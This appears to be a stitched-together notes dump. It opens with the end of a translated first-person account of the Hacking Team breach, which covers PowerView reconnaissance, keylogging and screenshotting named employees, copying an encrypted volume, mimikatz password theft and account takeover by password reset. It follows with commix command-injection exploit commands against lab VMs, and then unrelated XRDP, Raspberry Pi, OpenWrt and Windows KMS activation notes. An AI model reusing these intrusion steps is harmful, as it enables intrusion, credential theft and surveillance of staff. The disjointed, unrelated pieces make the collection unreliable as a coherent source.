[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/

[3] http://www.hexacorn.com/blog/category/autostart-persistence/

[4] https://blog.netspi.com/tag/persistence/

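13.3 Internal reconnaissance

The best tool these days for exploring Windows networks is PowerView [1]. The write-ups on using it are worth reading [2], [3], [4], [5], [6].

PowerShell is also a powerful tool here. But because many servers are still 2003 and 2000 versions (which have no PowerShell), you still have to fall back on the traditional ways, such as the netview.exe [9] tool or the Windows "net view" command. Other techniques I recommend:

(1) Downloading file lists

With a domain admin account, you can use PowerView to download a list of all the files on the network:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

(2) Reading email

As mentioned above, we can now download mail with PowerShell and get useful information from it.

(3) Reading SharePoint

Likewise, SharePoint is an important management system for a company, and you can download its contents with PowerShell [10] as well.

(4) Active Directory [11]

It holds a great deal of useful information, such as users and computers. You can obtain it without a domain admin account using PowerView and other tools [12]. After becoming domain admin, you can export information from AD with csvde or other tools.

(5) Monitoring employees

By monitoring Christian Pozzi (Hacking Team's system administrator) I gained access to the Nagios network monitoring server, which gave me access to the 'rete sviluppo' zone (the development network where the RCS source code is stored). With a simple combination of PowerSploit's Get-Keystrokes and Get-TimedScreenshot [13], Do-Exfiltration from nishang (a PowerShell-based penetration testing framework), and GPO, I could monitor any employee on the network, or even the entire domain.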

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

[2] http://www.harmj0y.net/blog/tag/powerview/

[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/

[4] http://www.harmj0y.net/blog/redteaming/powerview20/

[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

[6] http://www.slideshare.net/harmj0y/i-have-the-powerview

[7] https://adsecurity.org/?p=2535

[8] https://www.youtube.com/watch?v=rpwrKhgMd7E

[9] https://github.com/mubix/netview

[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/

[11] https://adsecurity.org/?page_id=41

[12] http://www.darkoperator.com/?tag=Active+Directory

[13] https://github.com/PowerShellMafia/PowerSploit

[14] https://github.com/samratashok/nishang

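14. Hunting sysadmins

From the internal IT infrastructure documentation [1] I knew I still had no access to the important 'Rete Sviluppo' zone, a separate network where the RCS source code is stored. A company's system administrators usually have access to all devices, networks and systems. I searched the computers of Mauro Romeo and Christian Pozzi to see how they accessed the 'rete sviluppo' zone and whether there were other useful systems. Accessing their computers was easy: I had domain admin rights and their computers were part of the Windows domain, so I could administer them. Mauro Romeo's computer had no open ports, so I opened the WMI port in order to run meterpreter [3]. Besides collecting keystrokes and application activity with Get-Keystrokes and Get-TimedScreenshot, I used many of metasploit's gather modules and CredMan.ps1 [4], and searched through the results. Later I saw that Pozzi had an encrypted volume, waited for it to be mounted, and then copied it. Probably many people here will laugh at Christian Pozzi's weak passwords (and Christian Pozzi has given us plenty of comedy material [6][7][8][9]). In the end, mimikatz and the keylogger yielded all the passwords.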

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/

[2] http://www.hammer-software.com/wmigphowto.shtml

[3] https://www.trustedsec.com/june2015/no_psexec_needed/

[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde

[5] http://pwnwiki.io/#!presence/windows/find_files.md

[6] http://archive.is/TbaPy

[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/

[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt

[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

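15. The bridge

Inside Christian Pozzi's encrypted volume was a text file holding many passwords. One of them was for the Nagios server, which, in order to monitor the network, had access to the 'Rete Sviluppo' zone. That put a bridge between the separated networks.

16. Reusing and resetting passwords

Reading the mail, I saw Daniele Milan granting access to the git repositories. I already had his Windows password, thanks to mimikatz. I tried logging in to the git server with it, and it worked! I tried sudo with it, and that worked too! For his gitlab server and twitter account, I used the "forgot password" function and reset the passwords through email.

17. Conclusion

That is the whole process. That is how easy it is to break into a company and stop it from continuing to violate human rights. This is the charm and the asymmetric beauty of hacking: with only 100 hours of work, one can destroy years of work by a company valued at millions of dollars. Hacking gives the oppressed the ability to fight and to win.

Hacking Team has always seen itself as a point of Italian innovation. But I see Vincenzetti, together with his company and his friends in politics and the police, as belonging to the tradition of Italian fascism. Finally, I want to dedicate this guide to the victims of the raid on the Armando Diaz school, and to those whose blood was spilled at the hands of Italian fascists.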

[1] https://twitter.com/coracurrier/status/618104723263090688

*Source: pastebin; compiled and translated by FreeBuf editor troy. When reposting, please credit FreeBuf (FreeBuf.COM).

Standard XRDP installation on Ubuntu 16.04

From:http://c-nergy.be/blog/?p=8952

Assumptions

For this post, we have made some assumptions.

  • Ubuntu 16.04 (Final Release version) is used
  • The Mate-desktop will be installed on the machine (as alternative desktop environment)
  • We will configure our system to match our localized setup (i.e. we are using a Belgian French keyboard)
  • Since Ubuntu 15.04, upstart has been replaced by the systemd component. The systemd component is used in our scenario
  • No additional configuration is needed to reconnect to the same session if you are using the latest version of the xrdp package found in the Ubuntu Repository

Installation Process

Step 1 – Install XRDP Package from Ubuntu Repository

A standard installation for us means that we will be using the xrdp package available within the Ubuntu repository. To install the xrdp software from Ubuntu repository, you will need to issue the following command in a terminal.

sudo apt-get install xrdp

Because of the sudo command, you will be prompted for a password. After entering your password, you will be asked to confirm your action by pressing Y.

Step 2 – Install an alternative Desktop 

xrdp and the Unity desktop (or Gnome 3) do not work well together. If you do not install another desktop environment, you will see only a gray screen when you try to connect to your Ubuntu machine. The workaround is to install an alternate desktop that works with xrdp.

Our preferred desktop alternative is Mate-Desktop.  This post will show you how to install the Mate-Desktop and have it working with the xrdp software solution.

To install the Mate-desktop, issue the following command from the Terminal Session

sudo apt-get update

sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon

Note :

Desktop environments such as xfce, LXDE, LXQT and KDE are all potential candidates.  Check the following links for more information and installation and configuration procedures

 

Step 3 – Configuring xRDP to use your desktop environment

At this stage, we need to configure our system in order to tell xrdp that an alternate desktop needs to be used.  In our case, we have to tell xrdp that we want to use Mate-Desktop as alternate desktop. With the previous version of Ubuntu, you would need to create the ~/.xsession file.  In Ubuntu 16.04, it seems that this approach is not working anymore.  We need to configure the system differently when working with Ubuntu 16.04

Starting the alternate desktop environment

Important Note : 

In our scenario, we have installed mate-desktop. If you have installed another desktop alternative, you will have to adapt the configuration of the startwm.sh file to reflect your settings.

If you use the  ~/.xsession file approach, you will experience the same symptoms as before i.e. grey screen. We will need to configure the system in a different way.  To have xRDP working in Ubuntu 16.04, you will need to  update the /etc/xrdp/startwm.sh file. To configure this, issue the following command in your Terminal console

sudo sed -i.bak '/fi/a #xrdp multiple users configuration \n mate-session \n' /etc/xrdp/startwm.sh


Note :

Remember that the command above is to be used when you have installed the Mate-Desktop.  If you have installed a different desktop environment, you will need to adapt the command accordingly. Please check the following links

Step 4 – Configuring xRDP Keyboard 

By default, the xRDP login screen will use an en-us keyboard layout. Your remote session will also use the en-us keyboard layout.  If you are using a keyboard layout other than the English one, you need to perform the following actions to update the configuration of the xrdp software.

In my case, I’m using a Belgian French keyboard, so I had to tell xrdp to use the belgian french keyboard as well.  To do that, you need to perform the following actions :

Step 1 : You go to the /etc/xrdp directory

Step 2 : Issue the command setxkbmap -layout <%your layout%> to define which keyboard map/layout to use

Step 3 : Create a copy of the km-0409.ini file in the same directory. It seems that this is the default file used by xrdp to define the keyboard layout. You will need to use sudo in order to be able to write into the directory

Step 4 : Check that you have a backup of your file by typing the dir or ls command

Step 5 : Update the file by issuing the following command: sudo xrdp-genkeymap km-0409.ini

Step 5 – Reconnect to the Same Session

Since Ubuntu 14.10, a new xrdp package has been made available in the Ubuntu repository. This package fixes a long time issue related to the fact that users could not reconnect to the same session.  If you are using the package xrdp 0.6.1-1, you do not need to perform any customization, you will reconnect automatically to the same session.

Commix usage Examples

1. Exploiting [Damn Vulnerable Web App] (http://www.dvwa.co.uk/):

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting [php-Charts 1.0] (http://www.exploit-db.com/exploits/25496/) using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting [OWASP Mutillidae] (https://www.owasp.org/index.php/Category:OWASP_Mutillidae) using extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using ICMP exfiltration technique:

python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using an alternative (python) shell:

python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting [Kioptrix: Level 1.1 (#2)] (http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar):

python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting [Kioptrix: 2014 (#5)] (https://www.vulnhub.com/entry/kioptrix-2014-5,62/) using custom user-agent and specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting [CVE-2014-6271/Shellshock] (https://pentesterlab.com/exercises/cve-2014-6271):

python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting [commix-testbed (cookie)] (https://github.com/stasinopoulos/commix-testbed/tree/master/cookie) using cookie-based injection:

python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting [commix-testbed (user-agent)] (https://github.com/stasinopoulos/commix-testbed/tree/master/user-agent) using ua-based injection:

python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting [commix-testbed (referer)] (https://github.com/stasinopoulos/commix-testbed/tree/master/referer) using referer-based injection:

python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting [Flick 2] (https://www.vulnhub.com/entry/flick-2,122/) using custom headers and base64 encoding option:

python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting [commix-testbed (JSON-based)] (https://github.com/stasinopoulos/commix-testbed/tree/master/scenarios/regular/POST) using JSON POST data:

python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting [SickOs 1.1] (https://www.vulnhub.com/entry/sickos-11,132/) using shellshock module and HTTP proxy:

python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

Raspberry pi 2 build kernel

Kernel Building

There are two main methods for building the kernel. You can build locally on a Raspberry Pi which will take a long time; or you can cross-compile, which is much quicker, but requires more setup.

Local building

On a Raspberry Pi first install the latest version of Raspbian from the downloads page. Then boot your Pi, plug in Ethernet to give you access to the sources, and log in.

First get the sources, which will take some time:

$ git clone --depth=1 https://github.com/raspberrypi/linux

Add missing dependencies:

$ sudo apt-get install bc

Configure the kernel – as well as the default configuration you may wish to configure your kernel in more detail or apply patches from another source to add or remove required functionality:

Run the following commands depending on your Raspberry Pi version.

Raspberry Pi 1 (or Compute Module) Default Build Configuration

$ cd linux
$ KERNEL=kernel
$ make bcmrpi_defconfig

Raspberry Pi 2 Default Build Configuration

$ cd linux
$ KERNEL=kernel7
$ make bcm2709_defconfig

Build and install the kernel, modules and Device Tree blobs; this step takes a lot of time…

$ make zImage modules dtbs
$ sudo make modules_install
$ sudo cp arch/arm/boot/dts/*.dtb /boot/
$ sudo cp arch/arm/boot/dts/overlays/*.dtb* /boot/overlays/
$ sudo cp arch/arm/boot/dts/overlays/README /boot/overlays/
$ sudo scripts/mkknlimg arch/arm/boot/zImage /boot/$KERNEL.img

Note: On a Raspberry Pi 2, adding -j4 (make -j4 zImage modules dtbs) splits the work between all four cores, speeding up compilation significantly.

Cross-compiling

First you are going to require a suitable Linux cross-compilation host. We tend to use Ubuntu; since Raspbian is also a Debian distribution it means using similar command lines and so on.

You can either do this using VirtualBox (or VMWare) on Windows, or install it directly onto your computer. For reference you can follow instructions online at Wikihow.

Install toolchain

Use the following command:

$ git clone https://github.com/raspberrypi/tools

You can then copy the toolchain to a common location such as /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian, and add /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin to your $PATH in the .bashrc in your home directory. For 64bit, use /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian-x64/bin. While this step is not strictly necessary, it does make it easier for later command lines!

Get sources

To get the sources, refer to the original GitHub repository for the various branches.

$ git clone --depth=1 https://github.com/raspberrypi/linux

Build sources

To build the sources for cross-compilation there may be extra dependencies beyond those you’ve installed by default with Ubuntu. If you find you need other things please submit a pull request to change the documentation.

Enter the following commands to build the sources and Device Tree files.

For Pi 1 or Compute Module:

$ cd linux
$ KERNEL=kernel
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcmrpi_defconfig

For Pi 2:

$ cd linux
$ KERNEL=kernel7
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcm2709_defconfig

Then for both:

$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- zImage modules dtbs

Note: To speed up compilation on multiprocessor systems, and get some improvement on single processor ones, use -j n where n is number of processors * 1.5. Alternatively, feel free to experiment and see what works!

Install directly onto the SD card

Having built the kernel you need to copy it onto your Raspberry Pi and install the modules; this is best done directly using an SD card reader.

First use lsblk before and after plugging in your SD card to identify which one it is; you should end up with something like this:

sdb
   sdb1
   sdb2

If it is a NOOBS card you should see something like this:

sdb
  sdb1
  sdb2
  sdb3
  sdb5
  sdb6

In the first case sdb1 is the FAT partition and sdb2 is the ext4 filesystem; on a NOOBS card they are sdb5 and sdb6 respectively.

Mount these first:

mkdir -p mnt/fat32
mkdir -p mnt/ext4
sudo mount /dev/sdb1 mnt/fat32
sudo mount /dev/sdb2 mnt/ext4

Adjust the partition numbers for the NOOBS images.
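The lsblk before/after comparison and the partition mapping described above, as an added shell example (not part of the original guide): it takes two `lsblk -rno NAME,TYPE` snapshots, refuses to continue unless exactly one new disk appeared, and returns the FAT and ext4 partitions for a plain or NOOBS card. The function names, the constructed sample listings and the handling of mmcblk-style device names go beyond the text and are assumptions.

```sh
#!/bin/sh
# Added example: choose the SD card from two `lsblk -rno NAME,TYPE` snapshots.
# Function names and sample listings are illustrative, not from the guide.

# new_disks BEFORE AFTER: print whole disks present in AFTER but not in BEFORE.
new_disks() {
    before=$1
    printf '%s\n' "$2" | awk '$2 == "disk" { print $1 }' | while read -r d; do
        printf '%s\n' "$before" |
            awk -v d="$d" '$1 == d { found = 1 } END { exit !found }' ||
            printf '%s\n' "$d"
    done
}

# part_name DISK N: sdb + 1 -> sdb1, mmcblk0 + 1 -> mmcblk0p1.
part_name() {
    case $1 in
        *[0-9]) printf '%sp%s\n' "$1" "$2" ;;
        *)      printf '%s%s\n' "$1" "$2" ;;
    esac
}

# _has_part LISTING NAME: succeed if NAME is listed as a partition.
_has_part() {
    printf '%s\n' "$1" |
        awk -v n="$2" '$1 == n && $2 == "part" { f = 1 } END { exit !f }'
}

# sd_partitions DISK LISTING: print "FAT EXT4".
# Partitions 5 and 6 on a NOOBS card, otherwise 1 and 2 (mapping from the text).
sd_partitions() {
    listing=$2
    fat=$(part_name "$1" 5); ext=$(part_name "$1" 6)
    if _has_part "$listing" "$fat" && _has_part "$listing" "$ext"; then
        echo "$fat $ext"; return 0
    fi
    fat=$(part_name "$1" 1); ext=$(part_name "$1" 2)
    if _has_part "$listing" "$fat" && _has_part "$listing" "$ext"; then
        echo "$fat $ext"; return 0
    fi
    return 1
}

# pick_sd_card BEFORE AFTER: print "DISK FAT EXT4", or fail without output
# on stdout when zero or several disks appeared or the layout is unknown.
pick_sd_card() {
    disks=$(new_disks "$1" "$2")
    count=$(printf '%s' "$disks" | grep -c . || true)
    if [ "$count" -ne 1 ]; then
        echo "expected exactly one new disk, found $count" >&2
        return 1
    fi
    parts=$(sd_partitions "$disks" "$2") || {
        echo "unrecognised partition layout on $disks" >&2
        return 1
    }
    echo "$disks $parts"
}

# Constructed sample listings (not captured from a real machine).
BEFORE_SAMPLE='sda disk
sda1 part
sda2 part'
AFTER_PLAIN="$BEFORE_SAMPLE
sdb disk
sdb1 part
sdb2 part"
AFTER_NOOBS="$BEFORE_SAMPLE
sdb disk
sdb1 part
sdb2 part
sdb3 part
sdb5 part
sdb6 part"

# Live use: before=$(lsblk -rno NAME,TYPE), insert the card,
# after=$(lsblk -rno NAME,TYPE), then pick_sd_card "$before" "$after".
pick_sd_card "$BEFORE_SAMPLE" "$AFTER_PLAIN"
pick_sd_card "$BEFORE_SAMPLE" "$AFTER_NOOBS"
```

Feed the three printed fields into the mount commands instead of typing /dev/sdb1 and /dev/sdb2 by hand, so a mistaken device name never reaches mount or cp.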

Next, install the modules:

sudo make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- INSTALL_MOD_PATH=mnt/ext4 modules_install

Finally, copy the kernel and Device Tree blobs onto the SD card, making sure to back up your old kernel:

sudo cp mnt/fat32/$KERNEL.img mnt/fat32/$KERNEL-backup.img
sudo scripts/mkknlimg arch/arm/boot/zImage mnt/fat32/$KERNEL.img
sudo cp arch/arm/boot/dts/*.dtb mnt/fat32/
sudo cp arch/arm/boot/dts/overlays/*.dtb* mnt/fat32/overlays/
sudo cp arch/arm/boot/dts/overlays/README mnt/fat32/overlays/
sudo umount mnt/fat32
sudo umount mnt/ext4

Another option is to copy the kernel into the same place, but with a different filename – for instance, kernel-myconfig.img – rather than overwriting the kernel.img file. You can then edit the config.txt file to select the kernel that the Pi will boot into:

kernel=kernel-myconfig.img

This has the advantage of keeping your kernel separate from the kernel image managed by the system and any automatic update tools, and allowing you to easily revert to a stock kernel in the event that your kernel cannot boot.

Finally, plug the card into the Pi and boot it!

Links

Building / cross-compiling on/for other operating systems

  • Pidora
  • ArchLinux
  • RaspBMC
  • OpenELEC

KVM virtual machine iptables NAT port mapping

# iptables -A INPUT -p tcp --dport 8000 -j ACCEPT

# iptables -t nat -A PREROUTING -d 115.183.0.1 -p tcp -m tcp --dport 8000 -j DNAT --to-destination 192.168.122.2:22

# iptables -t nat -A POSTROUTING -s 192.168.122.0/255.255.255.0 -d 192.168.122.2 -p tcp -m tcp --dport 22 -j SNAT --to-source 192.168.122.1

Easy Build Openwrt

I just got a TP-Link TL-MR3040 a few days ago, and successfully set it up as a PirateBox, which involved refreshing the firmware with OpenWrt rather than a stock image. This is actually a pretty cool little device for $35: it’ll run Linux, and with OpenWrt it can not only function as a router but also act as a tiny server running off a file system attached via USB.

I’ve tried this build on multiple platforms, and documented some of that in a previous version of this posting. While I’ve successfully gotten the core of OpenWrt to build on OS X, and a number of things to build on CentOS, I’ve only gotten consistent and reliable results overall on Debian-like systems, so that’s what I’m going to be sticking to here.

In particular, I’ve had nothing but trouble trying to build an OpenWrt image for a Raspberry Pi anywhere other than on Debian or a Debian derivative. I have verified working builds for both the TL-MR3040 and the Raspberry Pi on Mint 17.

The instructions for building a firmware image on the OpenWrt wiki are a version or more out of date — they’re for building Attitude Adjustment, rather than Barrier Breaker.

The procedure for building top-of-trunk for OpenWrt developers is better documented than the Attitude Adjustment build seems to have been, but still a little bit scattered.

Additionally, the guide for setting up a build environment on OS X relies on MacPorts (I prefer Homebrew) and is similarly outdated, and there is a wrinkle or two along the way, so I figured I should document what I’ve done. I’m not recommending, at this point, that you try building this stuff directly on OS X. My recommendation is to use a VM running Debian or Mint instead.

Set Up the Prerequisites

On Ubuntu 14.04 LTS “Trusty Tahr”/Debian 7.7.0/Mint 17

sudo apt-get install subversion build-essential libncurses5-dev zlib1g-dev gawk git ccache gettext libssl-dev xsltproc zip

On OS X 10.10 “Yosemite”

On OS X, we’ll want to specifically set up a case-sensitive file system to work on. We can create a .dmg file that we can use for our development with the following commands. Twenty gig is plenty of space.

hdiutil create -size 20g -fs "Case-sensitive HFS+" -volname OpenWrt OpenWrt.dmg
hdiutil attach OpenWrt.dmg

Getting the build environment set up right here is a little more ornate. If you don’t have Homebrew (and you should), you’ll need to get that installed first. You’ll also need to install Xcode and the Xcode Command Line Tools.

brew update
brew upgrade
brew install coreutils e2fsprogs ossp-uuid asciidoc binutils fastjar gtk+ gnu-getopt gnu-tar intltool openssl subversion rsync sdcc gawk wget findutils

When brew installs the GNU toolset, it doesn’t automatically link it into your path, and the build wants to use GNU-compatible tools. However, brew does create an auxiliary directory of GNU-compatible aliases at /usr/local/opt/coreutils/libexec/gnubin, and for the purposes of the build, we can temporarily put that directory first in our path so those tools are preferred.

ln -s /usr/local/Cellar/gnu-getopt/1.1.5/bin/getopt /usr/local/opt/coreutils/libexec/gnubin/getopt
ln -s /usr/local/bin/gtar /usr/local/opt/coreutils/libexec/gnubin/tar
export PATH=/usr/local/opt/coreutils/libexec/gnubin:$PATH

Get the Sources

Get the Barrier Breaker sources from the upstream repo to build the current stable release:

git clone git://git.openwrt.org/14.07/openwrt.git

Or pull down the latest OpenWrt “Chaos Calmer” sources to build the “bleeding edge” top-of-trunk version:

git clone git://git.openwrt.org/openwrt.git

Prepare For the Build

Change to the source directory, then update and install all the feeds. These represent the build schemes for all of the optional components that you can add to your OpenWrt system.

cd ~/openwrt
./scripts/feeds update -a
./scripts/feeds install -a

Configure the build.

make prereq

This sets up prerequisites for the build and then takes you into menuconfig, a screen-driven configuration utility based on the one used to set up builds for the Linux kernel.

To start, you simply want to pick an appropriate “Target system” and “Target profile”. For the TP-Link TL-MR3040, the target system is “Atheros AR7xxx/9xxx”, subtarget “generic”. For a Raspberry Pi, the target system is “BRCOM947xx/953xx”, and the only profile is “Raspberry Pi”.

For an initial build, I’d suggest simply picking the correct target and leaving it at that. You can start adding other options once you’ve verified that you can produce a working build and have an idea how much free space you’ve got to play with on the system. You want to start out minimal: the MR3040 only has 4MB (!) of available flash memory.

When you’re done here, select “Exit”, and save your configuration file as .config when prompted to do so.

Build that sucker!

All it takes is a make at this point. I like to use make V=s because I like to watch it do its thing.

make

Results will be in the bin/ folder, in a subfolder corresponding to the architecture you’ve built for — in my case “ar71xx”.

New OpenWrt router

opkg update
opkg install cfdisk kmod-tun ip dnscrypt-proxy e2fsprogs luci kmod-ath9k-htc kmod-usb-net kmod-usb-net-ipheth kmod-usb-serial kmod-usb-serial-pl2303 kmod-usb-serial-wwan kmod-usb-storage kmod-usbmon reaver wget tar curl aircrack-ng reaver tcpdump ethtool usbutils macchanger udev block-mount kmod-ath9k-common kmod-ath9k nano
opkg update
opkg install cfdisk kmod-usb-storage e2fsprogs kmod-usbmon kmod-fs-ext4 block-mount usbutils udev vim-full kmod-usb-net kmod-usb-net-rndis kmod-usb-net-cdc-ether dnscrypt-proxy
 
 
opkg install cfdisk kmod-usb-storage e2fsprogs kmod-usbmon kmod-fs-ext4 block-mount usbutils udev vim-full
 
 
/etc/init.d/dnscrypt-proxy enable
/etc/init.d/dnscrypt-proxy start
 
vim /etc/config/dhcp
# option resolvfile '/tmp/resolv.conf.auto'
option noresolv '1'
list server '127.0.0.1#5353'
list server '/pool.ntp.org/208.67.222.222'
list server '/pool.ntp.org/208.67.220.220'
 
 
/etc/init.d/dnsmasq restart
mkdir -p /mnt/sda2
mount /dev/sda2 /mnt/sda2

mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda2 -xf -

umount /tmp/cproot
umount /mnt/sda2

/etc/init.d/fstab enable
/etc/init.d/fstab start

vi /etc/config/fstab   # change as follows

config 'mount'
        option target '/'
        option device '/dev/sda2'
        option fstype 'ext4'
        option options 'rw,sync'
        option enabled '1'
        option enabled_fsck '0'

Windows activation

wget https://www.dwhd.org/wp-content/uploads/2015/07/vlmcsd-svn812-2015-08-30-Hotbird64.zip
unzip -q vlmcsd-svn812-2015-08-30-Hotbird64.zip -d /usr/local/
ln -sv /usr/local/vlmcsd-svn812-2015-08-30-Hotbird64/ /usr/local/KMS
echo "export PATH=/usr/local/KMS/binaries/Linux/intel/static:\$PATH" > /etc/profile.d/vlmcs.sh
source /etc/profile.d/vlmcs.sh
chmod +x /usr/local/KMS/binaries/Linux/intel/static/*
echo "vlmcsd-x64-musl-static" >> /etc/rc.local
vlmcsd-x64-musl-static
Windows PowerShell
版权所有 (C) 2015 Microsoft Corporation。保留所有权利。
PS C:\WINDOWS\system32> slmgr.vbs -upk
PS C:\WINDOWS\system32> slmgr.vbs -ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
PS C:\WINDOWS\system32> slmgr.vbs -skms 192.168.1.227
PS C:\WINDOWS\system32> slmgr.vbs -ato
PS C:\WINDOWS\system32> slmgr.vbs -dlv
PS C:\WINDOWS\system32>
OPERATING SYSTEM EDITION                                KMS CLIENT SETUP KEY
#############################  Windows  10  ########################################
Windows 10 Professional                                W269N-WFGWX-YVC9B-4J6C9-T83GX
Windows 10 Professional N                            MH37W-N47XK-V7XM9-C7227-GCQG9
Windows 10 Enterprise                                NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Enterprise N                                DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Education                                NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Education N                                2WH4N-8QGBV-H22JP-CT43Q-MDWWJ
Windows 10 Enterprise 2015 LTSB                        WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2015 LTSB N                    2F77B-TNFGY-69QQF-B8YKP-D69TJ
#############################  Windows  8.1 2012R2  #################################
Windows 8.1 Professional                            GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
Windows 8.1 Professional N                            HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
Windows 8.1 Enterprise                                MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Enterprise N                            TT4HM-HN7YT-62K67-RGRQJ-JFFXW
Windows Server 2012 R2 Server Standard                D2N9P-3P6X9-2R39C-7RTCD-MDVJX
Windows Server 2012 R2 Datacenter                    W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9
Windows Server 2012 R2 Essentials                    KNC87-3J2TX-XB4WP-VCPJV-M4FWM
#############################  Windows  8 2012  ######################################
Windows 8 Professional                                NG4HW-VH26C-733KW-K6F98-J8CK4
Windows 8 Professional N                            XCVCF-2NXM9-723PB-MHCB7-2RYQQ
Windows 8 Enterprise                                32JNW-9KQ84-P47T8-D8GGY-CWCK7
Windows 8 Enterprise N                                JMNMF-RHW7P-DMY6X-RF3DR-X2BQT
Windows Server 2012                                    BN3D2-R7TKB-3YPBD-8DRP2-27GG4
Windows Server 2012 N                                8N2M2-HWPGY-7PGT9-HGDD8-GVGGY
Windows Server 2012 Single Language                    2WN2H-YGCQR-KFX6K-CD6TF-84YXQ
Windows Server 2012 Country Specific                4K36P-JN4VD-GDC6V-KDT89-DYFKP
Windows Server 2012 Server Standard                    XC9B7-NBPP2-83J2H-RHMBY-92BT4
Windows Server 2012 MultiPoint Standard                HM7DN-YVMH3-46JC3-XYTG7-CYQJJ
Windows Server 2012 MultiPoint Premium                XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G
Windows Server 2012 Datacenter                        48HP8-DN98B-MYWDG-T2DCC-8W83P
#############################  Windows  7 2008R2  ####################################
Windows 7 Professional                                FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
Windows 7 Professional N                            MRPKT-YTG23-K7D7T-X2JMM-QY7MG
Windows 7 Professional E                            W82YF-2Q76Y-63HXB-FGJG9-GF7QX
Windows 7 Enterprise                                33PXH-7Y6KF-2VJC9-XBBR8-HVTHH
Windows 7 Enterprise N                                YDRBP-3D83W-TY26F-D46B2-XCKRJ
Windows 7 Enterprise E                                C29WB-22CC8-VJ326-GHFJW-H9DH4
Windows Server 2008 R2 Web                            6TPJF-RBVHG-WBW2R-86QPH-6RTM4
Windows Server 2008 R2 HPC edition                    TT8MH-CG224-D3D7Q-498W2-9QCTX
Windows Server 2008 R2 Standard                        YC6KT-GKW9T-YTKYR-T4X34-R7VHC
Windows Server 2008 R2 Enterprise                    489J6-VHDMP-X63PK-3K798-CPX3Y
Windows Server 2008 R2 Datacenter                    74YFP-3QFB3-KQT8W-PMXWJ-7M648
Windows Server 2008 R2 for Itanium-based Systems    GT63C-RJFQ3-4GMB6-BRFB9-CB83V
#############################  Windows  Vista 2008 ####################################
Windows Vista Business                                YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista Business N                            HMBQG-8H2RH-C77VX-27R82-VMQBT
Windows Vista Enterprise                            VKK3X-68KWM-X2YGT-QR4M6-4BWMV
Windows Vista Enterprise N                            VTC42-BM838-43QHV-84HX6-XJXKV
